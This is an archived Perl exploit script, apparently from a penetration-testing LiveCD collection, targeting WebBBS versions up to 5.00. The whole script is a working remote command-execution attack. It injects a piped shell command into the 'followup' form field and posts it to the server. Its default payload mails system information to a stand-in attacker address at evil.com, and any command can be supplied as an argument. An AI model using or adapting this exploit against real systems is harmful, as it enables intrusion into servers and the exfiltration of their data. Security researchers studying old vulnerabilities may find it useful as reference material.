home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / webbbs / webbbsexploit.pl < prev   
Perl Script  |  2005-02-12  |  2KB  |  64 lines

  1. #!/usr/bin/perl
  2. #
  3. #  nerF gr0up
  4. #
  5. #  exploit code for
  6. #  WebBBS by Darryl C. Burgdorf
  7. #  all version up to 5.00 are vulnerable
  8. #
  9. #
  10. #  this is an exploitation of "followup" bug.
  11. #  it allows remote attacker to execute shell
  12. commands.
  13. #  you can find WebBBS script at
  14. http://awsd.com/scripts/webbbs/
  15. #
  16. #  06.06.2002
  17. #  btr // nerf
  18. # nerf.ru
  19.  
  20. use IO::Socket;
  21.  
  22.         srand();
  23.         $script = "/cgi-bin/webbbs/webbbs_config.pl";
  24.         $command = "uname -a|mail zlo@evil.com";
  25.         $host = "localhost";
  26.         $port = 80;
  27.  
  28.         $content = "$content" . "name=" . rand(254);
  29.         $content = "$content" . "&email=" . rand(254);
  30.         $content = "$content" . "&subject=" .
  31. rand(254);
  32.         $content = "$content" . "&body=" . rand(254);
  33.  
  34. $content="$content"."&followup=".rand(254)."|$command|";
  35.  
  36.         $content_length = length($content);
  37.         $content_type =
  38. "application/x-www-form-urlencoded";
  39.  
  40.         if (@ARGV[0]) {$command=@ARGV[0];}
  41.         if (@ARGV[1]) {$host=@ARGV[1];}
  42.         if (@ARGV[2]) {$script=@ARGV[2];}
  43.  
  44.         $buf = "POST " . "$script" . "?post
  45. HTTP/1.0\n";
  46.         $buf = "$buf" . "Content-Type:
  47. $content_type\r\nContent-Length:";
  48.         $buf = "$buf" .
  49. "$content_length\r\n\r\n$content", 0;
  50.  
  51.         print "\tnerF gr0up\n";
  52.         print "exploit: WebBBS (awsd.com), version up
  53. to 5.00\n";
  54.  
  55.         print "sent:\n$buf\n";
  56.  
  57. if($socket = IO::Socket::INET->new("$host:$port")){
  58.  
  59.         print $socket "$buf";
  60.         read($socket,$buf,1500);
  61.         print "recieved:\n$buf\n";
  62. }
  63.  
  64.